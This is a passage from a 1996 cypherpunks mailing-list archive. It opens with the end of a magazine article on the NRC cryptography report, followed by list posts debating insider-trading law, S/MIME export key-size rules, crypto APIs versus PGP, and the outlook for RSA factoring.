 
   The NRC report, entitled "Cryptography's Role in Securing 
   the Information Society," stands as the most serious 
   challenge to current policy. It is drenched in credibility: 
   its 16 authors include former attorney general Benjamin 
   Civiletti, onetime NSA deputy director Ann Caracristi, 
   privacy expert Willis Ware and cryptographer Martin 
   Hellman. The panel was briefed by all sides of the issue, 
   including some classified sessions with government 
   officials. Despite the group's diversity, it reached 
   consensus: "Widespread commercial and private use of 
   cryptography is inevitable in the long run and ... its 
   advantages, on balance, outweigh its disadvantages." 
 
   The NRC made some specific recommendations. The government 
   should stop building a system around the umproven 
   Clipper-style technology. The export regulations should be 
   relaxed, specifically permitting free export of the 
   well-tested Data Encryption Standard, which uses a 56-bit 
   key. (While some argue for even bigger keys, this is a 
   significant jump. The increase in key size alone means that 
   theoretically it will be more than 65,000 times harder to 
   crack a code.) Perhaps the strongest rebuke came with the 
   rejection of the "if you only knew" defense. The committee 
   concluded that informed decisions on crypto could be made 
   without access to classified material. 
 
   If the NRC advice was followed, would criminals hide 
   nefarious activities behind a digital wall of gibberish? 
   Quite possibly, admits the committee -- but without action 
   to promote crypto, we are increasingly dependent on a 
   computer-controlled world with insufficient protection. 
   "We're encouraging a world that supports greater 
   confidentiality -- but we think it's worth the risk," says 
   panelist Ray Ozzie, creator of IBM's Lotus Notes. The 
   committee cited security breaches like the recent raid on 
   Citicorp by Russian hackers, and warned that without 
   crypto, we are more vulnerable to "information warfare" 
   threats -- endangering operations like the 
   air-traffic-control system. 
 
   The government's response? "We do care about the security 
   of information, but we need to do it in a way that does not 
   diminish law enforcement," says an administration official. 
   "People writing academic reports can take chances. But when 
   you are the policeman, you have to err on the side of 
   protecting people." 
 
   The question is, which approach provides the most 
   protection? The NRC report undercuts the government's 
   position at a time when many were already beginning to 
   question it. On May 21, 11 senators sat down in a bugproof 
   room for a classified briefing, presumably designed to make 
   them rethink their proposals. But, said Leahy, "no one 
   seemed to change their mind." Looks like they've cracked 
   the code. 
 
   [Two photos] 'Pro-privacy, pro-jobs, pro-business': Sen. 
   Patrick Leahy (right) and Lotus Notes creator Ray Ozzie 
   think strong codes will make a stronger economy 
 
   _________________________________________________________ 
   [Box] 
 
   Sending Messages In Private 
 
   Cryptography makes it possible to turn intelligible words 
   into a hodgepodge of letters, numbers and symbols, keeping 
   them out of the hands of cybersnoops. 
 
   [Illustration: computer  > key > encrypted message > key > 
   computer.] 
 
   To send a private message through a network, a cryptography 
   program is used to "lock" the message -- making it 
   unreadable to anyone who intercepts it. 
 
   The program generates a secret, digital key when it 
   scrambles the message. The receiver then uses the key to 
   translate the message back into plain text. 
 
   _________________________________________________________ 
 
   [End] 
 
   Thanks to SL and Newsweek. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kurt Vile <vile@apdg.com>
Date: Tue, 4 Jun 1996 07:57:34 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Insider Non-Trading" (Re: Insider Trading and InsideInformation)
In-Reply-To: <add7aa1b010210045ad9@[205.199.118.202]>
Message-ID: <9606031802.AA12382@smile.apdg.com>
MIME-Version: 1.0
Content-Type: text/plain




tcmay@mail.got.net  wrote:

>The SEC tumbled to this some time ago, and now demands that all
>those who are insiders, or who are married to insiders, or who are
>golfing buddies of insiders register their trading intentions 90
>days in advance of any transaction. (This will increase to 120 days 
>in 1997, and 180 days the following year.)

Those intentions in all likelyhood will not be binding...When I  
used to work for Swiss Bank Corp, the SEC demanded that any person  
who was privy to trading information (basically everyone) had to  
file for approval before making a transaction.  This approval was  
non-binding. I don't think the SEC has the power to mandate that a  
entity commit to a trade 180 days before the trade is suppose to  
happen, after all the instrument the entity is registering their  
intent to make a trasaction in; could have something horrible happen  
to it within 180 days (apple could blow up their headquarters for  
example)

The SEC may however have the power to request a reason for your  
decision not to make the transaction.  Which seems like it would be  
alot of work, since their are tons of and tons of approvals that get  
made.  (I know alot of people who would make a request to trade  
something, not do a trade, but have another request become active  
when the original request expired (they give you a 2 week window or  
so))

--Kurt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 4 Jun 1996 07:21:16 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Java Crypto API questions
In-Reply-To: <199606031521.IAA12484@mail.pacifier.com>
Message-ID: <Pine.SOL.3.91.960603131147.5466B-100000@president.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, jim bell wrote:
> 
> But you haven't explained why somebody can't export JUST the signature.  You 
> know, import the software, have Sun sign it domestically, strip off everything that isn't a 
> signature, and export the signature.  Append it to the un-imported code 
> outside the country.

Ancillary device... It's pretty clear cut.

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 4 Jun 1996 10:33:13 +0800
To: cypherpunks@toad.com
Subject: Surveillance Cameras
Message-ID: <199606032014.NAA22221@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>Today's newspaper (SJ Mercury News) carried a long article about
>increasingly ubiquitous video surveillance cameras, and singled out the
>U.K. as a place that is leading. 

There was a news report on this a couple of months ago.  In addition to
the government surveillance cameras, when there's a major crime in the U.K. 
the cops have started collecting all the security tapes from offices, gas 
stations, railway stations, etc, etc in the surrounding area and scanning 
them to try to find the culprits.  The interesting things that they said 
were :

	1. The cameras only reduce crime rates locally, as the criminals
	   simply move to areas without cameras.
	2. The real criminals (e.g. IRA bombers) know how to disguise 
	   themselves well enough that the cameras cannot easily be used 
	   to identify them.
	3. The cameras are often pointed in the wrong direction, not
	   switched on or aren't recording.  A good example is the London
	   club which was bombed a year or so back.  The bomber walked
	   up to the entrance and placed the bomb directly in view of
	   the security camera.  It was switched off at the time ...
	4. Even when people are recorded, the resolution is often too
	   poor to identify them.

So it appears that the cameras are great for arresting people who urinate 
in bushes, but useless for catching real criminals. 

Alice de 'nonymous ...
 
                                  ...just another one of those...
 
 
P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rick hoselton <hoz@univel.telescan.com>
Date: Tue, 4 Jun 1996 10:05:55 +0800
To: cypherpunks@toad.com
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
Message-ID: <199606032018.NAA03658@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Perry E. Metzger writes: 

>> Timothy C. May writes:

Suggestion #1: 
Never get your legal advice from cypherpunks newsletter.

Suggestion #2:
If you absolutely can't resist going against Suggestion #1, 
then listen carefully to Perry.

As just a lowly programmer around here, I have often been told 
that I would be breaking the law if I trade on some piece of 
information before it becomes public.  I am not such an "insider" 
that I must register my trades 90 days in advance.  I've read the 
actual statute. (though I am not a lawyer and, these days, even 
lawyers don't know what a law means until the final verdict)

You might also want to ask Ivan Boeskey(sp?).  I think he's out of 
Federal prison by now.  He's the guy that cut a deal with the Feds 
to give him time to sell a few billion dollars worth of stock before 
being arrested, so that he could pay his fine.  Once he was arrested, 
the value of those stocks fell.  It looks to me like he and the Feds 
traded on inside information so that he could pay his fine for trading 
on inside information.  He still went to jail, and he had enough money 
for good lawyers.  Imagine what would happen to me!








>IANAL, but I think you must be wrong about this, Perry.  If this were
>the case then, as an employee of company XYZ, I would never be permitted
>to buy XYZ stock (which is clearly not the case) since I *always* have
>information that others outside the company do not (about staff changes,
>product plans and such).  I suspect the deciding factor must have to do
>with the ability to execute actions which have substantial direct effects
>on the stock price (i.e. buying a company, declaring dividends, having a
>massive downsizing, etc.).
>
>
>-- Jeff
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 4 Jun 1996 10:19:44 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto APIs Considered Harmful
Message-ID: <v02120d09add8f90a2a56@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 6/3/96, Timothy C. May wrote:

>So long as ASCII (or Unicode, increasingly) message blocks can be handled
>by a variety of editors, mailers, news programs, browsers, etc., it will be
>impossible to stop users from using crypto on these blocks.

I agree. But it really doesn't matter. The goal of the governments is not
to stop people that are willing to operate a crypto program on blocks of
text. That goal would be impossible to achieve. The goal of the governments
is to ensure that once Joe Sixpack clicks "Encrypt Mail" in Netscape or MS
Mail, the resulting cyphertext can still be read, though not by Joe
himself. It is *because* PGP operated on blocks of text and did not provide
a decent API that Joe (and even Tim May) are still not encrypting the bulk
of their email.

PGP isn't being used, because it lacks the API. S/MIME doesn't lack the API
and is therefore being supported by all the major players.

>But if crypto is tied to specific browsers, mailers, etc., this gives the
>NSA and ITAR office a way to impose limits.

Crypto should not be tied to specific browsers and mailers. Nor should it
be tied to a specific program such as PGP. That's why hooks and APIs are
crucial to gaining market acceptance.

[...]
>Obvious points. But in light of all the recent moves to limit deployment of
>crypto by limiting the "crypto API" approaches, it's useful to remember
>that for most applications, the message payload is perfectly suited for
>carrying digital signatures, encrypted blocks, etc.
>
>They can't stop the messages, can they?

Of course not. Nor do they want to. A little leakage around the edges is
fine, as long as the masses don't adopt strong crypto. And that is a given,
thanks to PGP's lack of modularity.

I am not just slamming PGP. It is not the only CP "friendly" software that
was implemented in an outdated, application-centric way. This was fine some
four years ago, when people were still using DA/Font Mover to install fonts
on their Mac, but it isn't today.

Today's realities of software development and customer expectations require
that secondary functionality (in this example, sending and receiving mail
is the primary functionality) such as encryption, message encoding, etc.
are completely transparent and fully integrate in the software that
provides the primary functionality. How many of you are still using
UUencode (the stand-alone program) when emailing someone a binary file? How
many of you are using the "Attach File" button in your mailer? How many
more people are sending binary files via email now that you can click
"Attach File" than did back when you had to use UUencode? I rest my case.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 07:37:46 +0800
To: norm@netcom.com (Norman Hardy)
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <add8d6a4070210044ee4@DialupEudora>
Message-ID: <199606031810.OAA05553@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Norman Hardy writes:
> At 8:01 AM 6/3/96, Perry E. Metzger wrote:
> >Dr. Dimitri Vulis writes:
> ....
> >> This'll happen, probably sooner than later.
> >
> >Why do you assume that? There are plenty of problems that are
> >provably not solvable in non-exponential time even if P=NP. What makes
> >you think this one is going to be solved?
> 
> The "Idea Futures" forum has established odds on this. The current odds are
> currently 60% that a 1024 bit number will be factored by 2010 and 30% that
> a 512 bit number will be factored by 1997.

Thats totally different from a high speed polynomial time factoring
algorithm. Thats saying we can factor bigger numbers with
time. Exponential growth still holds, however.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: assassin@gladstone.uoregon.edu
Date: Tue, 4 Jun 1996 10:33:48 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Arms Trafficker Page Made CNN!
Message-ID: <01I5H4HBQ11I8WW2JK@OREGON.UOREGON.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Do you have the cnn story on .../arms-trafficker/?
Just what mention of it was made?
-A.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 4 Jun 1996 11:38:26 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <add71e4c06021004bdfb@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960603144035.8479A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 2 Jun 1996, Timothy C. May wrote:

> At 4:30 PM 6/2/96, Martin Minow wrote:
> >>
> >>One of the oldest tricks for running a stock up (or down) is
> >>to put rumor teams on elevators in the financial district of
> >>major cities.
> >
> >It would be more efficient to talk about the rumor on a cellular
> >phone.  Probably make a nice sting scenario, too.
> 
> An interesting example, but I'm having a hard time figuring out who has
> committed a crime, even by SEC rules.
> 
> Namely, are the people "talking up" a stock committing a crime? Even if the
> SEC forbids this (under defined circumstances and for defined persons, as
> most of us are not covered by any such laws), how can talking over a
> "putatively secure" cell phone be construed as talking up a stock?

If it's in relation to a tender offer, they are in deep.  (As, for 
example, if they were hiking up price to deter a hostile aquisition).

[...]

> (To elaborate on this: I was never classified as an "insider" during my
> time at Intel, and I certainly bought and sold the stock based on what
> products and news I knew was coming out or what rumors I'd heard. Only a
> select group of executives and staff in the specific departments generating
> earnings announcements, auditing, etc., were covered. And senior executives
> are covered by various rules about trading stocks. And family members and
> friends may be covered, if they learn of "inside" (in the SEC sense)
> information. But ordinary people, even employees of a company, are not
> considered to be "insiders" and hence are not covered by insider trading
> laws.)

Incorrect.

I direct you to Dirks v. Securities and Exchange Commission, 463 U.S. 646 
(1983).

Specifically footnote 14:

"Under certain circumstances, such as where corporate information is 
revealed legitimately to an underwriter, accountant, lawyer, or 
consultant working for the corporation, these outsiders may become 
fiduciaries of the shareholders....  When such a person breaches his 
fiduciary relationship, he may be treated more properly as a tipper than 
a tipee...."

This circumstance is classically refered to as a "footnote 14 insider."

It has been held to apply to lower level employees within the corporation 
who "knowingly trade based on material non-public information acquired by 
virtue of their position within the company."

After 1983, Mr. May may have committed a crime.

The case against Mr. May would be strengthened if a court were to accept 
a misappropriation theory.  (In short, that the employee used information 
intended for corporate purposes [development, etc.] in order to trade 
stock for his gain).  Misappropriation theory, where it is accepted, 
fills in the needed "fraud" element in rule 10b-5 which would impose 
liability on a trader and which is otherwise absent in the case of an 
employee trading as Mr. May has indicated.  While misappropriation theory is 
waning, it is not entirely dead.

Remember that restrictions on senior management as per trading in the 
company's stock are to prevent director and corporate liability.  No one 
cares much if a lower level employee gets zapped because it doesn't open 
the door for greater corporate liability like it would for senior 
management.  Further, you don't want to have to circulate a memo to the 
whole company as to when trading is restricted.  That would be asking for 
trouble.

Be sure to distingiush between corporate policy with regard to 
employee trading and legality.

> So, the only way I can imagine the cell phone case leading to an insider
> trading charge is if the cell phone users _knew_ that the cell phones were
> not secure, and _planned_ to have their conversations overheard. The people
> doing the intercepting could be charged under one of the laws covering
> unauthorized interception of cell phone conversations, but probably not for
> insider trading.

Or if they were artifically hiking up the price to defend against or 
interefere with a tender offer.

> --Tim May

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 4 Jun 1996 09:05:22 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <199606031507.LAA15317@jafar.sware.com>
Message-ID: <Pine.SUN.3.91.960603150424.8479C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, Jeff Barber wrote:

> Perry E. Metzger writes:
> 
> > Timothy C. May writes:
> 
> > > And, how can someone who acts on overheard information--as in the elevator
> > > example Sandy cited--be charged with any crime? Unless they are "insiders,"
> > > covered by SEC rules about trading, they are free to act on essentially
> > > anything they hear.
> > 
> > No, I'm afraid they aren't. Under the rules, if you have nonpublic
> > information, even if you are not a corporate officer, you are an
> > insider for purposes of "insider trading" and your trades are illegal.
> 
> > > (To elaborate on this: I was never classified as an "insider" during my
> > > time at Intel, and I certainly bought and sold the stock based on what
> > > products and news I knew was coming out or what rumors I'd heard. Only a
> > > select group of executives and staff in the specific departments generating
> > > earnings announcements, auditing, etc., were covered.
> > 
> > Only they were covered by the rules that require registration of all
> > trades, you mean. You are completely confusing two uses of the word
> > "insider".
> 
> IANAL, but I think you must be wrong about this, Perry.  If this were
> the case then, as an employee of company XYZ, I would never be permitted
> to buy XYZ stock (which is clearly not the case) since I *always* have
> information that others outside the company do not (about staff changes,
> product plans and such).  I suspect the deciding factor must have to do
> with the ability to execute actions which have substantial direct effects
> on the stock price (i.e. buying a company, declaring dividends, having a
> massive downsizing, etc.).

Incorrect.
The deciding factor is the court's determiniation of whether the 
information was "material non-public information."  As the question of 
materiality is vague, subjective and subject to whim, even a low level 
employee is risking time and fines.  Often materiality has exactly zero 
to do with what effect it may have on stock price.

There is a simple solution to avoiding liability.  Don't trade in your 
own company's stock.

You make the case that it is somehow shocking to think that an employee 
wouldn't be able to buy stock in their employer.  Such restrictions have 
existed for decades.  Why are you so stunned?

> 
> 
> -- Jeff

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 09:08:54 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <Pine.SUN.3.91.960603150424.8479C-100000@polaris>
Message-ID: <199606031918.PAA05670@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> Incorrect.
> The deciding factor is the court's determiniation of whether the 
> information was "material non-public information."  As the question of 
> materiality is vague, subjective and subject to whim, even a low level 
> employee is risking time and fines.  Often materiality has exactly zero 
> to do with what effect it may have on stock price.

Mr. Unicorn has it exactly right.

> There is a simple solution to avoiding liability.  Don't trade in your 
> own company's stock.

In reality, of course, you are fairly safe so long as no one is
looking for your head and you aren't trading based on company
secrets. However, in theory, its possible to prosecute almost anyone.

> Such restrictions have existed for decades.  Why are you so stunned?

I guess this is all obvious to wall streeters like me, who live day to
day with yellow xeroxed sheets being mass distributed to all employees
informing us of the names of 150 companies that the firm has had
peripheral dealings with recently that we aren't allowed to trade for
some indeterminate period of time. People who don't live in regulatory
paranoia land often just don't get that the SEC's regulatory authority
is broad, based on very vague statutes, and capriciously
applied. Thats reality, folks. I suppose since most people have never
experienced it they don't understand what it's like....

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 4 Jun 1996 10:07:26 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <Pine.SUN.3.91.960603150424.8479C-100000@polaris>
Message-ID: <199606031918.PAA15670@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:

> Incorrect.
> The deciding factor is the court's determiniation of whether the 
> information was "material non-public information."  As the question of 
> materiality is vague, subjective and subject to whim, even a low level 
> employee is risking time and fines.  Often materiality has exactly zero 
> to do with what effect it may have on stock price.
> 
> There is a simple solution to avoiding liability.  Don't trade in your 
> own company's stock.
> 
> You make the case that it is somehow shocking to think that an employee 
> wouldn't be able to buy stock in their employer.  Such restrictions have 
> existed for decades.  Why are you so stunned?

I trust it won't stun you to find that many, many large and even small
corporations -- including my current employer [*NOT* SecureWare, BTW,
despite the email address] -- actually encourage their employees to buy
stock by offering stock purchase plans as a benefit of employment.  They
even make it convenient by deducting purchases from one's paycheck.

Presumably then, we ordinary employees are so in-the-dark that any
non-public information we do hold is considered non-material?

So perhaps Tim over-simplified by saying that there were no limits on
what ordinary employees could do.  OTOH, it seems that Perry also
over-simplified by flatly stating that Tim's trades while an Intel
employee were "illegal".


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 4 Jun 1996 11:09:37 +0800
To: unicorn@schloss.li>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
Message-ID: <199606032229.PAA17614@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:18 PM 6/3/96 -0400, Perry E. Metzger wrote:
>Black Unicorn writes:
>> There is a simple solution to avoiding liability.  Don't trade in your 
>> own company's stock.
>
>In reality, of course, you are fairly safe so long as no one is
>looking for your head and you aren't trading based on company
>secrets. However, in theory, its possible to prosecute almost anyone.

I hope insider trading never applies to the Company Stock Purchase plan or
Stock Options.  Otherwise they will kill the goose that lays Silicon
Valley's golden egg.  (I am always paranoid when the rules are vague and
the penalties draconian.)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 4 Jun 1996 11:35:42 +0800
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: NRC Session Hiss
Message-ID: <v02120d0badd919d1ddb3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:58 6/3/96, Raph Levien wrote:

>   Basically, an exportable S/MIME client can transmit messages up to
>1024/40 bit RSA/RC2 (or RSA/DES), and receive messages up to 512/64 bit
>RSA/RC2 (or RSA/DES, but in the latter case I would imagine it's actually
>restricted to 512/56 because of the keysize of DES). Note that the
>asymmetry actually points in different directions for the public and
>symmetric keysizes.

What will be the maximum keysize for a domestic encryption client? It it is
larger than 1024 bits, there will be interoperability problems with foreign
clients. If the domestic client is limited to 1024 bits, it would set a bad
precedence, since it would effectively require that the encryption key is
smaller than the largest signature key.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 4 Jun 1996 09:29:55 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Security of PGP if Secret Key Available?
Message-ID: <199606032026.QAA08222@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


With the MD5 collisions, can it be shown that plaintext passphrases 
are more likely to map to certain hashes than others? (And hence IDEA 
key search space reduced?)

Just speculation.

Rob.

On  3 Jun 96 at 2:36, Robert A. Hayden wrote:

[..]
> However, I got to wondering about the security of PGP assuming somebody 
> trying to read my PGPed stuff has my 1024-bit secret key.  ie, if I have 
> it on my personal computer, and somebody gets my secret key, how much 
> less robust has PGP just become, and what are appropriate and reasonable 
> steps to take to protect this weakness?



 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Tue, 4 Jun 1996 09:41:53 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: NRC Session Hiss
In-Reply-To: <199606030150.BAA27932@pipe2.t1.usa.pipeline.com>
Message-ID: <31B34402.3B2C@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> That PGP is ubiquitous is subject to discussion. PGP is widely available,
> but that doesn't mean that it is widely used. What percentage of email is
> PGP encrypted? Less than half a percent?

   Full agreement here. Further, nothing that the PGP people are doing 
seems likely to fundamentally change this fact.

> PGP was a failure in the mass market, regardless how popular it may be
> with some subscribers of this list. The email encryption method that *will*
> be ubiquitous and that will cause PGP to be used only by a relatively
> small fringe is S/MIME. Within a few months, S/MIME will be on the
> desktops of some 20 million people. It, not PGP is the future standard.

   Yes.

> Of course S/MIME will default to 40 bit RC-4 and carry the signatures
> outside the encryption envelope. There is little doubt in my mind that
> the pannel will find it much easier to support than PGP.

   Actually, this is the case in the current standard, but in the next 
one, it might change.
   I'll try to bring cypherpunks up to date - the debate is still 
happening on the smime-dev mailing list.

   A couple of weeks ago, one of RSA's consultants in Washington got what 
appears to be approval for certain relaxation of the export rules for 
S/MIME. The rules themselves apply to S/MIME only. They are also quite 
confusing, mostly because capabilities for message sending and message 
receiving are so asymmetric. I'll try to briefly summarize the 
characteristics of exportable S/MIME clients here.
   Signature generation is quite good - signatures can be generated and 
verified at 2048 bits. This applies both to messages and certificates. The 
limitations apply to encryption only.
   Basically, an exportable S/MIME client can transmit messages up to 
1024/40 bit RSA/RC2 (or RSA/DES), and receive messages up to 512/64 bit 
RSA/RC2 (or RSA/DES, but in the latter case I would imagine it's actually 
restricted to 512/56 because of the keysize of DES). Note that the 
asymmetry actually points in different directions for the public and 
symmetric keysizes.
   Most users of exportable clients will want to generate separate RSA 
keys for signatures and encryption, otherwise signatures would be limited 
to 512 bits.

   In any case, the fact that RSA keysizes are linked to symmetric 
keysizes is _extremely_ good news. It means that that it is possible to 
tell whether the recipient is an export version or not. If the keysize is 
512 bits or less, the default algorithm should be 64-bit RC2. Otherwise, 
it should be 168-bit Triple-DES. If you work it out, you'll see that this 
policy will not cause any interoperability problems. For example, if the 
default encryption algorithm were simply changed to Triple-DES, then 
export clients would be unable to read the message at all.

   I'm pushing to get this policy codified in the S/MIME implementation 
guidelines and also widely implemented. If this happens, there really 
wouldn't be much point in trying to keep PGP alive.

   Of course, the division into export and domestic versions would still 
probably ensure that most of the clients in the field were restricted to 
export-grade, but I think it's likely that the population of non-export 
clients will far exceed that of PGP, so it's progress in any case. Also, 
if S/MIME catches on, it creates a fabulous opportunity for a company 
outside the US to market good S/MIME clients.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 4 Jun 1996 09:36:38 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
Message-ID: <2.2.32.19960603200355.0075cc58@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 AM 6/3/96 -0400, Perry E. Metzger wrote:

>No, I'm afraid they aren't. Under the rules, if you have nonpublic
>information, even if you are not a corporate officer, you are an
>insider for purposes of "insider trading" and your trades are illegal.

Though if I trade based on my non public knowledge that the Gray Aliens will strike at Midnight on 31 December 1999, I am probably safe.  Doesn't the non-public knowledge have to have been generated or concern internal company information (or the intentions of a publisher or buyer concerning the company).  If info that is too far removed is included then any stock analysis system would be illegal.

Note BTW that the Feds lost almost all of the '80s insider trading cases that actually went to trial.  They only won 2 or 3 that went through the full trial and appeals process.  That is a very poor record since prosecutors usually have an 80-90% success rate in criminal trials. 

>Securities laws are extremely complex, extraordinarily broad, and
>subject to extremely flexible interpretation. I would suggest not
>attempting to skate a fine line near them -- the ice is very thin.

And like most federal criminal procedures based more on hype than reality.  One should emulate the head of Princeton Securities who showed up for settlement negotiations with the Feds wearing a "Shit Happens" baseball cap.  All charges dismissed on appeal.  

I do think though that many actual "inside traders" are pretty dumb since it is not hard to trade securities anonymously.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Tue, 4 Jun 1996 14:57:49 +0800
To: Norman Hardy <norm@netcom.com>
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <add8d6a4070210044ee4@DialupEudora>
Message-ID: <Pine.BSI.3.91.960603161453.20486C-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, Norman Hardy wrote:

> At 8:01 AM 6/3/96, Perry E. Metzger wrote:
> >Dr. Dimitri Vulis writes:
> ....
> >> This'll happen, probably sooner than later.
> >
> >Why do you assume that? There are plenty of problems that are
> >provably not solvable in non-exponential time even if P=NP. What makes
> >you think this one is going to be solved?
> >
> >.pm
> 
> The "Idea Futures" forum has established odds on this. The current odds are
> currently 60% that a 1024 bit number will be factored by 2010 and 30% that
> a 512 bit number will be factored by 1997.
> 

True, but by that time I'll be able to use 2048 or bigger keys with the same
or better performance as 1024 bit keys now.  As long as factoring is
exponential, you can always make it impossible to factor your keys. 
And I think it will always be exponential.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Tue, 4 Jun 1996 10:01:59 +0800
To: cypherpunks@toad.com
Subject: Idea 'bout banning the internet
Message-ID: <m0uQg3B-00038WC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


What if in the future a country banned the internet and all things that had
to deal with it (ie-  telnet, irc). It would be  the "underground" thing.
Just a thought, it would really suck! As I think about it it is impossible
or is it???? Hell the usa cant even ban porn let alone the whole thing. They
could ban it like they did fizzies. Hey there making a comeback did you here
now they have nutrasweet in them. If you know what fizzies are than your
